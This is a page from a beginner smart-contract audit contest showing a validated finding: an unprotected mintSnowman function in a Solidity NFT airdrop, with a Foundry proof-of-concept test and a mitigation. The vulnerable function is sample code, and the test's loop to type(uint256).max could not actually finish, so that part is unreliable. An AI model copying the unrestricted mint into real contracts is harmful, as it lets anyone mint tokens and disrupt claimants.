Snowman Merkle Airdrop
First Flight #42
Beginner FriendlyFoundrySolidityNFT
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Unbounded Nft minting allow DoS on `SnowmanAirdrop`.

juliancabmar

Description:
An attaker can mint Snowman NFT until counter reach the maximum value of uint256, after which no more NFTs can be minted, because this will cause a overflow condition.

function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
@> s_TokenCounter++;
}
}

Impact:
Once the counter hits its upper limit, no further Snowman NFTs can be claimed or minted, causing a permanent denial of service for new claimants, breaking the entire protocol.

Proof of Concept:
Add the following after the TestSnowmanAirdrop test suite:

function testDoSOnSnowmanNft() public {
// Simulating an attaker who has minted snow until the limit
vm.pauseGasMetering();
nft.mintSnowman(bob, type(uint256).max);
vm.resumeGasMetering();
// Alice claim setup
vm.prank(alice);
snow.approve(address(airdrop), 1);
// Get alice's digest
bytes32 alDigest = airdrop.getMessageHash(alice);
// alice signs a message
(uint8 alV, bytes32 alR, bytes32 alS) = vm.sign(alKey, alDigest);
// Alice try to claims a Nft using her signed message
vm.expectRevert();
vm.prank(alice);
airdrop.claimSnowman(alice, AL_PROOF, alV, alR, alS);
}

Recommended Mitigation:
Allow only SnowmanAirdrop can mint Snowman Nft.

Updates

Lead Judging Commences

yeahchibyke Lead Judge about 2 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Unrestricted NFT mint function

The mint function of the Snowman contract is unprotected. Hence, anyone can call it and mint NFTs without necessarily partaking in the airdrop.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.